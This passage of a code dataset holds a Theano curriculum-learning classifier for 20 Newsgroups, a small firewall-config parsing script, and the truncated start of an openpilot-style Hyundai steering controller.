where 1\n # represents a mistake in prediction\n return T.mean(T.neq(self.y_pred, y)).astype(theano.config.floatX)\n else:\n raise NotImplementedError()\n\nclass OVASVMLayer(object):\n \"\"\"SVM-like layer\n \"\"\"\n def __init__(self, input, n_in, n_out, inputIsSparse = True):\n \"\"\" Initialize the parameters of the logistic regression\n\n :type input: theano.tensor.TensorType\n :param input: symbolic variable that describes the input of the\n architecture (one minibatch)\n\n :type n_in: int\n :param n_in: number of input units, the dimension of the space in\n which the datapoints lie\n\n :type n_out: int\n :param n_out: number of output units, the dimension of the space in\n which the labels lie\n\n \"\"\"\n\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\n self.W = theano.shared(value=np.zeros((n_in, n_out),\n dtype=theano.config.floatX),\n name='W', borrow=True)\n # initialize the baises b as a vector of n_out 0s\n self.b = theano.shared(value=np.zeros((n_out,),\n dtype=theano.config.floatX),\n name='b', borrow=True)\n\n # parameters of the model\n self.params = [self.W, self.b]\n\n if inputIsSparse:\n self.output = sparse.structured_dot(input, self.W) + self.b\n else:\n self.output = T.dot(input, self.W) + self.b\n\n self.y_pred = T.argmax(self.output, axis=1)\n\n def hinge(self, u):\n return T.maximum(0, 1 - u)\n\n def cost_vec(self, y1):\n \"\"\" return the one-vs-all svm cost\n given ground-truth y in one-hot {-1, 1} form \"\"\"\n y1_printed = theano.printing.Print('this is important')(T.max(y1))\n margin = y1 * self.output\n cost = self.hinge(margin).sum(axis=1)\n return cost\n\n def cost(self, y1):\n cost = self.cost_vec(y1).mean(axis=0)\n return cost\n\n def errors(self, y):\n \"\"\" compute zero-one loss\n note, y is in integer form, not one-hot\n \"\"\"\n\n # check if y has same dimension of y_pred\n if y.ndim != self.y_pred.ndim:\n raise TypeError('y should have the same shape as self.y_pred',\n ('y', target.type, 'y_pred', self.y_pred.type))\n # check if y is of the correct datatype\n if y.dtype.startswith('int'):\n # the T.neq operator returns a vector of 0s and 1s, where 1\n # represents a mistake in prediction\n return T.mean(T.neq(self.y_pred, y))\n else:\n raise NotImplementedError()\n\ndef build_cnn(input_var, input_dim=100,\n fc_num_units=[], num_classes=20, rng=np.random.RandomState(23455), useSVM=True, \n 
**junk):\n # input layer\n #network = lasagne.layers.InputLayer(shape=(None,) + (input_shape,),\n # input_var=input_var)\n # fc-relu\n\n # construct a fully-connected sigmoidal layer\n for i in range(len(fc_num_units)):\n if i==0:\n network = HiddenLayer(\n rng,\n input=input_var,\n n_in=input_dim,\n n_out=fc_num_units[0],\n activation = T.tanh,\n )\n params=network.params\n else:\n network = HiddenLayer(\n rng,\n input=network.output,\n n_in=fc_num_units[i-1],\n n_out=fc_num_units[i],\n activation = T.tanh,\n inputIsSparse = False,\n )\n params = params + network.params \n\n # output layer\n if len(fc_num_units) == 0:\n if useSVM:\n network = OVASVMLayer(input=input_var, n_in=input_dim, n_out=num_classes)\n else:\n network = LogisticRegression(input=input_var, n_in=input_dim, n_out=num_classes)\n params = network.params\n else:\n if useSVM:\n network = OVASVMLayer(input=network.output, n_in=fc_num_units[-1], n_out=num_classes, inputIsSparse=False)\n else:\n network = LogisticRegression(input=input_var, n_in=fc_num_units[-1], n_out=num_classes, inputIsSparse=False)\n params = params + network.params\n\n return network, params\n\ndef label_vec2mat(data_y):\n\n n_classes = len(np.unique(data_y)) # dangerous?\n y1 = -1 * np.ones((data_y.shape[0], n_classes))\n y1[np.arange(data_y.shape[0]), data_y] = 1\n\n return y1\n\ndef load20newsgroup(categories=None, filtered=False, use_hashing=False, tsne_dim=512, num_cluster=200, dataset_name='20newsgroup'):\n\n if filtered:\n remove = ('headers', 'footers', 'quotes')\n else:\n remove = ()\n\n print(\"Loading 20 newsgroups dataset for categories:\")\n print(categories if categories else \"all\")\n\n data_train = fetch_20newsgroups(subset='train', categories=categories,\n shuffle=True, random_state=42,\n remove=remove)\n\n data_test = fetch_20newsgroups(subset='test', categories=categories,\n shuffle=True, random_state=42,\n remove=remove)\n print('data loaded')\n\n # order of labels in `target_names` can be different from `categories`\n target_names = data_train.target_names\n\n\n def size_mb(docs):\n return sum(len(s.encode('utf-8')) for s in docs) / 1e6\n\n data_train_size_mb = size_mb(data_train.data)\n data_test_size_mb = size_mb(data_test.data)\n\n print(\"%d documents - %0.3fMB (training set)\" % (\n len(data_train.data), data_train_size_mb))\n print(\"%d documents - %0.3fMB (test set)\" % (\n len(data_test.data), data_test_size_mb))\n\n # split a training set and a test set\n Y_train, Y_test = data_train.target, data_test.target\n\n print(\"Extracting features from the training data using a sparse vectorizer\")\n t0 = time.time()\n if use_hashing:\n vectorizer = HashingVectorizer(stop_words='english', non_negative=True,\n n_features=opts.n_features)\n X_train = vectorizer.transform(data_train.data)\n else:\n vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,\n stop_words='english')\n X_train = vectorizer.fit_transform(data_train.data)\n duration = time.time() - t0\n print(\"done in %fs at %0.3fMB/s\" % (duration, data_train_size_mb / duration))\n print(\"n_samples: %d, n_features: %d\" % X_train.shape)\n print()\n\n print(\"Extracting features from the test data using the same vectorizer\")\n t0 = time.time()\n X_test = vectorizer.transform(data_test.data)\n duration = time.time() - t0\n print(\"done in %fs at %0.3fMB/s\" % (duration, data_test_size_mb / duration))\n print(\"n_samples: %d, n_features: %d\" % X_test.shape)\n\n #dataGroup(X_train, y_train, tsne_dim, num_cluster, dataset_name, savefile=True)\n #dataGroup0(X_train, 
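For reference, label_vec2mat above turns integer labels into the {-1, 1} one-hot matrix the SVM layer expects; a small worked example (values chosen for illustration):

import numpy as np

data_y = np.array([0, 2, 1])
n_classes = len(np.unique(data_y))              # 3
y1 = -1 * np.ones((data_y.shape[0], n_classes))
y1[np.arange(data_y.shape[0]), data_y] = 1
# y1 == [[ 1, -1, -1],
#        [-1, -1,  1],
#        [-1,  1, -1]]

As the "dangerous?" comment hints, np.unique only counts the classes actually present in data_y, so a label vector missing a class would yield a too-narrow matrix; passing n_classes in explicitly would be the safer design.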
tsne_dim, num_cluster, dataset_name, savefile=True)\n labels_ = np.loadtxt(dataset_name + '_kmeans_labels.txt').astype(int)\n cluster_centers_ = np.loadtxt(dataset_name + '_kmeans_centers.txt')\n center_nn = np.loadtxt(dataset_name + '_center_nn.txt').astype(int)\n\n def shared_dataset(data_xy, borrow=True):\n \"\"\" Function that loads the dataset into shared variables\n\n The reason we store our dataset in shared variables is to allow\n Theano to copy it into the GPU memory (when code is run on GPU).\n Since copying data into the GPU is slow, copying a minibatch everytime\n is needed (the default behaviour if the data is not in a shared\n variable) would lead to a large decrease in performance.\n \"\"\"\n data_x, data_y = data_xy\n shared_x = sparse.shared(data_x.astype(theano.config.floatX),\n borrow=borrow)\n shared_y = theano.shared(np.asarray(data_y,dtype=theano.config.floatX),\n borrow=borrow)\n\n # one-hot encoded labels as {-1, 1}\n n_classes = len(np.unique(data_y)) # dangerous?\n y1 = -1 * np.ones((data_y.shape[0], n_classes))\n y1[np.arange(data_y.shape[0]), data_y] = 1\n shared_y1 = theano.shared(np.asarray(y1,\n dtype=theano.config.floatX),\n borrow=borrow)\n \n # When storing data on the GPU it has to be stored as floats\n # therefore we will store the labels as ``floatX`` as well\n # (``shared_y`` does exactly that). But during our computations\n # we need them as ints (we use labels as index, and if they are\n # floats it doesn't make sense) therefore instead of returning\n # ``shared_y`` we will have to cast it to int. This little hack\n # lets ous get around this issue\n return shared_x, T.cast(shared_y, 'int32'), T.cast(shared_y1, 'int32')\n\n #X_train, Y_train, Y1_train = shared_dataset((X_train, y_train))\n #X_test, Y_test, Y1_test = shared_dataset((X_test, y_test))\n\n return dict(\n X_train=X_train.astype(theano.config.floatX),\n Y_train=Y_train.astype('int32'),\n Y1_train=label_vec2mat(Y_train).astype('int32'),\n X_test=X_test.astype(theano.config.floatX),\n Y_test=Y_test.astype('int32'),\n Y1_test=label_vec2mat(Y_test).astype('int32'),\n kmeans_label = labels_.astype('int32'),\n kmeans_center = cluster_centers_.astype(theano.config.floatX),\n kmeans_center_nn = center_nn.astype('int32'),)\n\n# ############################## Main program ################################\n\ndef main(num_epochs=40, model=None, \n learning_rate=3.5, loss_weight = 6.5e+18, curriculum_rate=0.06, \n epoch_iters = 30, batch_size = 64, stain_factor = 30.0, \n k = 4, func = 'concavefeature', func_parameter = 0.5, useSVM = False):\n#def main(num_epochs=200, model=None, \n # learning_rate=8e-3, loss_weight = 3.5e+5, curriculum_rate=0.06, \n # epoch_iters = 50, batch_size = 64, stain_factor = 2.0, \n # k = 4, func = 'concavefeature', func_parameter = 0.5, useSVM = True):\n\n # Load the dataset\n # print(\"Loading data...\")\n data = load20newsgroup()\n X_train = data['X_train']\n #print(type(X_train.get_value(borrow=True)[range(2,5)]))\n Y_train = data['Y_train']\n Y1_train = data['Y1_train']\n X_test = data['X_test']\n Y_test = data['Y_test']\n Y1_test = data['Y1_test']\n labels_ = data['kmeans_label']\n labels_weight = np.array([len(np.where(labels_==i)[0]) for i in np.unique(labels_)])\n labels_weight = np.divide(labels_weight,float(np.max(labels_weight)))\n\n cluster_centers_ = data['kmeans_center']\n center_nn = data['kmeans_center_nn']\n num_cluster = cluster_centers_.shape[0]\n\n # compute number of minibatches for training, validation and testing\n n_train = X_train.shape[0]\n 
n_train_batches = n_train // batch_size\n n_test = X_test.shape[0]\n n_test_batches = n_test // batch_size\n center_pass = np.ones(len(center_nn))\n\n index = T.lscalar()\n cindex = T.lvector()\n x = sparse.csr_matrix('x')\n y = T.ivector('y')\n if useSVM:\n y1 = T.imatrix('y1')\n else:\n Y1_train = Y_train\n Y1_test = Y_test\n y1 = T.ivector('y1')\n\n # Create neural network model\n print(\"Building model and compiling functions...\")\n rng = np.random.RandomState(23455)\n network, params = build_cnn(x, input_dim=X_train.shape[1], num_classes=len(np.unique(Y_train)), useSVM=useSVM)\n cost = network.cost(y1)\n cost_vec = network.cost_vec(y1)\n \n if model is None:\n\n # create a list of gradients for all model parameters\n grads = T.grad(cost, params)\n\n updates = []\n for param_i, grad_i in zip(params, grads):\n updates.append((param_i, param_i - learning_rate * grad_i))\n\n # train_model = theano.function([cindex], cost, updates=updates,\n # givens={\n # x: X_train[cindex,:],\n # y1: Y1_train[cindex]})\n\n train_model = theano.function([x, y1], cost, updates=updates)\n\n # loss_model = theano.function([cindex], network.cost_vec(y1),\n # givens={\n # x: X_train[cindex,:],\n # y1: Y1_train[cindex]})\n\n loss_model = theano.function([x, y1], cost_vec)\n\n # create a function to compute the mistakes that are made by the model\n # test_model = theano.function([cindex], network.errors(y),\n # givens={\n # x: X_test[cindex,:],\n # y: Y_test[cindex]})\n\n test_model = theano.function([x, y, y1], [network.errors(y), cost])\n\n # error_model = theano.function([cindex], network.errors(y),\n # givens={\n # x: X_train[cindex,:],\n # y: Y_train[cindex]})\n\n print(\"model complied, initialize curriculum...\")\n\n #initialize\n minGain, sinGain, optSubmodular = initSubmodularFunc(cluster_centers_, k)\n old_all_loss = float('inf')\n passed_index = np.array([]) \n passes = 0\n output_seq = ()\n if model is None:\n # launch the training loop\n print(\"Starting training...\")\n submodular_time = 0\n start_epochs_time = time.time()\n for epoch in range(num_epochs):\n\n if len(passed_index) <= n_train:\n\n stain_weight = np.power(center_pass, -1/stain_factor)\n start_time = time.time()\n for iters in range(epoch_iters):\n\n # compute loss\n submodular_start_time = time.time()\n loss_vec_center = loss_model(X_train[center_nn], Y1_train[center_nn])\n all_loss = sum(loss_vec_center)\n loss_vec_center *= labels_weight * stain_weight * (loss_weight / num_cluster)\n topkLoss = sum(np.partition(loss_vec_center, -k)[-k:])\n #print(optSubmodular, topkLoss)\n optObj = optSubmodular + topkLoss\n\n if epoch % 6 == 0 and epoch > 200:\n train_index = np.random.choice(n_train, 32, replace=False)\n else:\n # update A (topkIndex)\n left_index = pruneGroundSet(minGain, sinGain, loss_vec_center, k)\n topkIndex = modularLowerBound(cluster_centers_[left_index,:], k, func, func_parameter, loss_vec_center[left_index], optObj)\n topkIndex = left_index[topkIndex]\n center_pass[topkIndex] += 2.0\n\n # update classifier (train_model) \n train_index = np.array([])\n for i in range(len(topkIndex)):\n train_index = np.append(train_index, np.where(labels_ == topkIndex[i])[0])\n train_index = np.random.permutation(train_index.astype(int))\n #print('number of training samples =', len(train_index))\n passes += len(train_index)\n passed_index = np.unique(np.append(passed_index, train_index))\n submodular_time += (time.time() - submodular_start_time)\n\n # training by mini-batch sgd\n start_index = 0\n train_loss = np.array([])\n while 
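The curriculum step above keeps the k largest per-cluster losses via np.partition; a minimal standalone sketch of that idiom (toy values, not from the run):

import numpy as np

loss_vec_center = np.array([0.3, 2.1, 0.7, 5.0, 1.2])
k = 2
topk = np.partition(loss_vec_center, -k)[-k:]   # the k largest values (order not guaranteed)
topk_loss = topk.sum()                          # 2.1 + 5.0 == 7.1

np.partition is a linear-time selection (no full sort), which matters here because this runs inside the inner training loop on every iteration.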
start_index < len(train_index):\n end_index = min([start_index + batch_size, len(train_index)])\n batch_index = train_index[start_index : end_index]\n start_index = end_index\n train_loss = np.append(train_loss, train_model(X_train[batch_index], Y1_train[batch_index]))\n this_train_loss = np.mean(train_loss)\n\n else:\n \n train_index = np.arange(X_train.shape[0])\n np.random.shuffle(train_index)\n train_index = train_index[:3000]\n passes += len(train_index)\n passed_index = np.unique(np.append(passed_index, train_index))\n \n # training by mini-batch sgd\n start_time = time.time()\n start_index = 0\n train_loss = np.array([])\n while start_index < len(train_index):\n end_index = min([start_index + batch_size, len(train_index)])\n batch_index = train_index[start_index : end_index]\n start_index = end_index\n train_loss = np.append(train_loss, train_model(X_train[batch_index], Y1_train[batch_index]))\n this_train_loss = np.mean(train_loss)\n all_loss = np.sum(train_loss)\n\n # And a full pass over the validation data:\n start_index = 0\n train_err = np.array([])\n train_loss = np.array([])\n while start_index < n_train:\n end_index = min([start_index + batch_size, n_train])\n batch_index = range(start_index, end_index)\n batch_err, batch_loss = test_model(X_train[batch_index], Y_train[batch_index], Y1_train[batch_index])\n train_err = np.append(train_err, batch_err)\n train_loss = np.append(train_loss, batch_loss)\n start_index = end_index\n this_train_err = np.mean(train_err)\n this_train_loss = np.mean(train_loss)\n\n start_index = 0\n test_err = np.array([])\n test_loss = np.array([])\n while start_index < n_test:\n end_index = min([start_index + batch_size, n_test])\n batch_index = range(start_index, end_index)\n batch_err, batch_loss = test_model(X_test[batch_index], Y_test[batch_index], Y1_test[batch_index])\n test_err = np.append(test_err, batch_err)\n test_loss = np.append(test_loss, batch_loss)\n start_index = end_index\n this_test_err = np.mean(test_err)\n this_test_loss = np.mean(test_loss)\n\n # Then we print the results for this epoch:\n print(\"Epoch {} of {} took {:.3f}s, up to now {} trainings {} passes\".format(\n epoch + 1, num_epochs, time.time() - start_time, len(passed_index), passes))\n print(\" training err:\\t\\t{:.6f}\".format(this_train_err*100.))\n print(\" test err:\\t\\t{:.6f}\".format(this_test_err*100.))\n print(\" training loss:\\t\\t{:.2f}\".format(this_train_loss))\n print(\" test loss:\\t\\t{:.2f}\".format(this_test_loss))\n\n output_seq = output_seq + (np.array([len(passed_index),passes,this_train_loss,this_test_loss,this_train_err*100.,this_test_err*100.]),)\n # increase curriculum rate\n loss_weight *= curriculum_rate + 1\n k = min([k + 20, num_cluster])\n if all_loss > 1.001 * old_all_loss:\n print('no improvement: reduce learning rate!')\n learning_rate *= 0.96\n old_all_loss = all_loss\n\n # dump the network weights to a file :\n print('Total time =', time.time() - start_epochs_time)\n print('Submodular time =', submodular_time)\n with open('20newsgroups_shallow_model.pkl', 'wb') as f:\n pickle.dump(network, f)\n output_seq = np.vstack(output_seq)\n np.savetxt('20newsgroups_logistic_cLearn_k+20_result.txt', output_seq)\n else:\n # load network weights from model file\n network = pickle.load(open('20newsgroups_shallow_model.pkl'))\n\n return output_seq\n\n\nif __name__ == '__main__':\n if ('--help' in sys.argv) or ('-h' in sys.argv):\n print(\"Trains a Deep Residual Learning network on 20newsgroup using Theano.\")\n print(\"Network architecture and 
training parameters are as in section 4.2 in 'Deep Residual Learning for Image Recognition'.\")\n print(\"Usage: %s [N [MODEL]]\" % sys.argv[0])\n print()\n print(\"N: Number of stacked residual building blocks per feature map (default: 5)\")\n print(\"MODEL: saved model file to load (for validation) (default: None)\")\n else:\n kwargs = {}\n if len(sys.argv) > 1:\n kwargs['n'] = int(sys.argv[1])\n if len(sys.argv) > 2:\n kwargs['model'] = sys.argv[2]\n output_seq = main(**kwargs)\n\n plt.figure(figsize = (20, 10))\n plt.subplot(1,2,1)\n plt.plot(output_seq[:, 1], output_seq[:, 2], 'yo-', label = 'training loss')\n plt.plot(output_seq[:, 1], output_seq[:, 3], 'co-', label = 'training err')\n plt.plot(output_seq[:, 1], output_seq[:, 4], 'mo-', label = 'test err')\n plt.grid()\n plt.legend(fontsize='large', loc = 1)\n plt.ylabel('Error rate (%)') \n plt.xlabel('Number of passed training samples (including copies)')\n\n plt.subplot(1,2,2)\n plt.plot(output_seq[:, 0], output_seq[:, 2], 'yo-', label = 'training loss')\n plt.plot(output_seq[:, 0], output_seq[:, 3], 'co-', label = 'training err')\n plt.plot(output_seq[:, 0], output_seq[:, 4], 'mo-', label = 'test err')\n plt.grid()\n plt.legend(fontsize='large', loc = 1)\n plt.ylabel('Error rate (%)') \n plt.xlabel('Size of set of passed training samples')\n \n plt.savefig('20newsgroup_logistic_cLearn_k+20.eps', format = 'eps', bbox_inches='tight')\n plt.show()","sub_path":"svm_curriculum.py","file_name":"svm_curriculum.py","file_ext":"py","file_size_in_byte":31250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81980785","text":"import re\nimport sys\nburb_set = set()\nfile = open(sys.argv[1], 'r').read().splitlines()\nprint('\\n \\n \\n \\n \\n ')\nfor line in file:\n if re.search('(?<=set vsys \").*?(?=\")', line):\n match = re.search('(?<=set vsys \").*?(?=\")', line)\n vsys = match.group(0)\n vsys = (' \\n ')\n print(vsys)\nprint(' \\n \\n \\n')\n","sub_path":"scripts/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101407493","text":"from cereal import car, log\nfrom common.realtime import DT_CTRL\nfrom selfdrive.car import apply_std_steer_torque_limits\nfrom selfdrive.car.hyundai.hyundaican import create_lkas11, create_clu11, create_lfa_mfa, create_mdps12\nfrom selfdrive.car.hyundai.values import Buttons, SteerLimitParams, CAR, FEATURES\nfrom opendbc.can.packer import CANPacker\nfrom selfdrive.config import Conversions as CV\nfrom common.numpy_fast import interp\n\n# speed controller\nfrom selfdrive.car.hyundai.spdcontroller import SpdController\nfrom selfdrive.car.hyundai.spdctrlSlow import SpdctrlSlow\nfrom selfdrive.car.hyundai.spdctrlNormal import SpdctrlNormal\nfrom selfdrive.car.hyundai.spdctrlFast import SpdctrlFast\n\nfrom common.params import Params\nfrom selfdrive.kyd_conf import kyd_conf\nimport common.log as trace1\nimport common.CTime1000 as tm\n\nVisualAlert = car.CarControl.HUDControl.VisualAlert\nLaneChangeState = log.PathPlan.LaneChangeState\n\nclass CarController():\n def __init__(self, dbc_name, CP, VM):\n self.CP = CP\n self.apply_steer_last = 0\n self.car_fingerprint = CP.carFingerprint\n self.packer = CANPacker(dbc_name)\n self.steer_rate_limited = False\n self.resume_cnt = 0\n self.last_resume_frame = 0\n self.last_lead_distance = 0\n self.lanechange_manual_timer = 0\n self.emergency_manual_timer = 0\n 
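A note on template.py, the short script in the record above: the assignment vsys = (' \n ') replaces the captured vsys name before it is printed, so the loop only ever prints whitespace. Assuming the intent was to print each captured vsys name, a minimal corrected sketch is:

import re
import sys

for line in open(sys.argv[1]).read().splitlines():
    match = re.search(r'(?<=set vsys ").*?(?=")', line)
    if match:
        print(match.group(0))   # the vsys name captured between the quotes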
self.driver_steering_torque_above_timer = 0\n self.mode_change_timer = 0\n\n self.steer_mode = \"\"\n self.mdps_status = \"\"\n self.lkas_switch = \"\"\n\n self.lkas11_cnt = 0\n\n self.nBlinker = 0\n\n self.dRel = 0\n self.yRel = 0\n self.vRel = 0\n\n self.timer1 = tm.CTime1000(\"time\")\n self.model_speed = 0\n self.model_sum = 0\n \n # hud\n self.hud_timer_left = 0\n self.hud_timer_right = 0\n\n self.command_cnt = 0\n self.command_load = 0\n self.params = Params()\n\n # param\n self.param_preOpkrAccelProfile = -1\n self.param_OpkrAccelProfile = 0\n self.param_OpkrAutoResume = 0\n self.param_OpkrEnableLearner = 0\n\n self.SC = None\n self.traceCC = trace1.Loger(\"CarController\")\n\n self.res_cnt = 7\n self.res_delay = 0\n\n kyd = kyd_conf()\n self.driver_steering_torque_above = float(kyd.conf['driverSteeringTorqueAbove'])\n\n self.params = Params()\n self.mode_change_switch = int(self.params.get('CruiseStatemodeSelInit'))\n\n def process_hud_alert(self, enabled, CC ):\n visual_alert = CC.hudControl.visualAlert\n left_lane = CC.hudControl.leftLaneVisible\n right_lane = CC.hudControl.rightLaneVisible\n\n sys_warning = (visual_alert == VisualAlert.steerRequired)\n\n if left_lane:\n self.hud_timer_left = 100\n\n if right_lane:\n self.hud_timer_right = 100\n\n if self.hud_timer_left:\n self.hud_timer_left -= 1\n \n if self.hud_timer_right:\n self.hud_timer_right -= 1\n\n\n # initialize to no line visible\n sys_state = 1\n if self.hud_timer_left and self.hud_timer_right or sys_warning: # HUD alert only display when LKAS status is active\n if enabled or sys_warning:\n sys_state = 3\n else:\n sys_state = 4\n elif self.hud_timer_left:\n sys_state = 5\n elif self.hud_timer_right:\n sys_state = 6\n\n return sys_warning, sys_state\n\n\n def param_load(self ):\n self.command_cnt += 1\n if self.command_cnt > 100:\n self.command_cnt = 0\n\n if self.command_cnt % 10:\n return\n\n self.command_load += 1\n if self.command_load == 1:\n self.param_OpkrAccelProfile = int(self.params.get('OpkrAccelProfile')) \n elif self.command_load == 2:\n self.param_OpkrAutoResume = int(self.params.get('OpkrAutoResume'))\n else:\n self.command_load = 0\n \n self.param_OpkrEnableLearner = int(self.params.get('OpkrEnableLearner'))\n\n # speed controller\n if self.param_preOpkrAccelProfile != self.param_OpkrAccelProfile:\n self.param_preOpkrAccelProfile = self.param_OpkrAccelProfile\n if self.param_OpkrAccelProfile == 1:\n self.SC = SpdctrlSlow()\n elif self.param_OpkrAccelProfile == 2:\n self.SC = SpdctrlNormal()\n else:\n self.SC = SpdctrlFast()\n\n\n #아톰님 보간함수 참조\n def cV_tune( self, v_ego, cv_value ): # cV(곡률에 의한 변화)\n kyd = kyd_conf()\n self.sRKPHV = [9., 22.]\n self.cVBPV = kyd.conf['cvBPV'] # 곡률\n self.cvSteerMaxV1 = kyd.conf['cvSteerMaxV1']\n self.cvSteerDeltaUpV1 = kyd.conf['cvSteerDeltaUpV1']\n self.cvSteerDeltaDnV1 = kyd.conf['cvSteerDeltaDnV1']\n self.cvSteerMaxV2 = kyd.conf['cvSteerMaxV2']\n self.cvSteerDeltaUpV2 = kyd.conf['cvSteerDeltaUpV2']\n self.cvSteerDeltaDnV2 = kyd.conf['cvSteerDeltaDnV2']\n\n cv_BPV = self.cVBPV # 곡률\n # Max\n self.steerMax1 = interp( cv_value, cv_BPV, self.cvSteerMaxV1 )\n self.steerMax2 = interp( cv_value, cv_BPV, self.cvSteerMaxV2 )\n self.steerMaxV = [ float(self.steerMax1), float(self.steerMax2) ]\n self.MAX = interp( v_ego, self.sRKPHV, self.steerMaxV ) \n\n # Up\n self.steerUP1 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV1 )\n self.steerUP2 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV2 )\n self.steerUPV = [ float(self.steerUP1), float(self.steerUP2) ]\n self.UP = interp( 
v_ego, self.sRKPHV, self.steerUPV )\n\n # Dn\n self.steerDN1 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV1 )\n self.steerDN2 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV2 ) \n self.steerDNV = [ float(self.steerDN1), float(self.steerDN2) ]\n self.DN = interp( v_ego, self.sRKPHV, self.steerDNV )\n\n\n def update(self, CC, CS, frame, sm, CP ):\n\n if self.CP != CP:\n self.CP = CP\n\n self.param_load()\n \n enabled = CC.enabled\n actuators = CC.actuators\n pcm_cancel_cmd = CC.cruiseControl.cancel\n \n self.dRel, self.yRel, self.vRel = SpdController.get_lead( sm )\n\n if self.SC is not None:\n self.model_speed, self.model_sum = self.SC.calc_va( sm, CS.out.vEgo )\n else:\n self.model_speed = self.model_sum = 0\n\n # Steering Torque\n if self.param_OpkrEnableLearner:\n new_steer = actuators.steer * SteerLimitParams.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, SteerLimitParams)\n self.steer_rate_limited = new_steer != apply_steer\n else:\n path_plan = sm['pathPlan']\n self.cV_tune( CS.out.vEgo, self.model_speed )\n param = SteerLimitParams()\n param.STEER_MAX = min( param.STEER_MAX, self.MAX )\n param.STEER_DELTA_UP = min( param.STEER_DELTA_UP, self.UP )\n param.STEER_DELTA_DOWN = min( param.STEER_DELTA_DOWN, self.DN )\n new_steer = actuators.steer * param.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, param) \n self.steer_rate_limited = new_steer != apply_steer\n\n\n # disable if steer angle reach 90 deg, otherwise mdps fault in some models\n lkas_active = enabled and abs(CS.out.steeringAngle) < 90.\n\n if (( CS.out.leftBlinker and not CS.out.rightBlinker) or ( CS.out.rightBlinker and not CS.out.leftBlinker)) and CS.out.vEgo < 60 * CV.KPH_TO_MS:\n self.lanechange_manual_timer = 10\n if CS.out.leftBlinker and CS.out.rightBlinker:\n self.emergency_manual_timer = 10\n if abs(CS.out.steeringTorque) > self.driver_steering_torque_above and CS.out.vEgo < 60:\n self.driver_steering_torque_above_timer = 30\n if self.lanechange_manual_timer or self.driver_steering_torque_above_timer:\n lkas_active = 0\n if self.lanechange_manual_timer > 0:\n self.lanechange_manual_timer -= 1\n if self.emergency_manual_timer > 0:\n self.emergency_manual_timer -= 1\n if self.driver_steering_torque_above_timer > 0:\n self.driver_steering_torque_above_timer -= 1\n\n if not lkas_active:\n apply_steer = 0\n\n steer_req = 1 if apply_steer else 0 \n\n self.apply_steer_last = apply_steer\n\n sys_warning, sys_state = self.process_hud_alert( lkas_active, CC )\n\n clu11_speed = CS.clu11[\"CF_Clu_Vanz\"]\n enabled_speed = 38 if CS.is_set_speed_in_mph else 55\n if clu11_speed > enabled_speed:\n enabled_speed = clu11_speed\n\n can_sends = []\n if frame == 0: # initialize counts from last received count signals\n self.lkas11_cnt = CS.lkas11[\"CF_Lkas_MsgCount\"] + 1\n self.lkas11_cnt %= 0x10\n\n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 0 ))\n if CS.mdps_bus or CS.scc_bus == 1: # send lkas11 bus 1 if mdps is on bus 1 \n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 1 ))\n\n if CS.mdps_bus: # send clu11 to mdps if it is not on bus 0 \n #if frame % 2 and CS.mdps_bus == 1: # send clu11 to mdps if it is not on bus 0 \n can_sends.append(create_clu11(self.packer, frame, CS.mdps_bus, 
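The cV_tune method above is a two-stage linear interpolation: each steering limit is first interpolated over curvature breakpoints (cvBPV), and the two resulting values are then interpolated over ego speed (sRKPHV). A self-contained sketch of the same pattern, with illustrative numbers standing in for the kyd_conf values:

from numpy import interp   # same call signature as the controller's interp helper

cv_bp    = [30., 255.]     # curvature breakpoints (stand-in for cvBPV)
max_lo_v = [384., 255.]    # steer max values tuned for the low-speed breakpoint
max_hi_v = [255., 200.]    # steer max values tuned for the high-speed breakpoint
speed_bp = [9., 22.]       # m/s, mirrors self.sRKPHV

def tuned_steer_max(v_ego, cv_value):
    lo = interp(cv_value, cv_bp, max_lo_v)        # stage 1: interpolate by curvature
    hi = interp(cv_value, cv_bp, max_hi_v)
    return interp(v_ego, speed_bp, [lo, hi])      # stage 2: interpolate by speed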
CS.clu11, Buttons.NONE, enabled_speed))\n \n #if CS.mdps_bus:\n can_sends.append(create_mdps12(self.packer, frame, CS.mdps12)) \n\n str_log1 = '곡률={:05.1f}/{:=+06.3f} 토크={:=+04.0f}/{:=+04.0f}'.format( self.model_speed, self.model_sum, new_steer, CS.out.steeringTorque )\n if self.param_OpkrEnableLearner:\n str_log2 = '프레임율={:03.0f} STMAX={:03.0f}'.format( self.timer1.sampleTime(), SteerLimitParams.STEER_MAX, )\n else:\n str_log2 = '프레임율={:03.0f} ST={:03.0f}/{:01.0f}/{:01.0f} SR={:05.2f}'.format( self.timer1.sampleTime(), self.MAX, self.UP, self.DN, path_plan.steerRatio )\n trace1.printf( '{} {}'.format( str_log1, str_log2 ) )\n\n if CS.out.cruiseState.modeSel == 0 and self.mode_change_switch == 4:\n self.mode_change_timer = 50\n self.mode_change_switch = 0\n elif CS.out.cruiseState.modeSel == 1 and self.mode_change_switch == 0:\n self.mode_change_timer = 50\n self.mode_change_switch = 1\n elif CS.out.cruiseState.modeSel == 2 and self.mode_change_switch == 1:\n self.mode_change_timer = 50\n self.mode_change_switch = 2\n elif CS.out.cruiseState.modeSel == 3 and self.mode_change_switch == 2:\n self.mode_change_timer = 50\n self.mode_change_switch = 3\n elif CS.out.cruiseState.modeSel == 4 and self.mode_change_switch == 3:\n self.mode_change_timer = 50\n self.mode_change_switch = 4\n if self.mode_change_timer > 0:\n self.mode_change_timer -= 1\n\n run_speed_ctrl = self.param_OpkrAccelProfile and CS.acc_active and self.SC != None and (CS.out.cruiseState.modeSel == 1 or CS.out.cruiseState.modeSel == 2 or 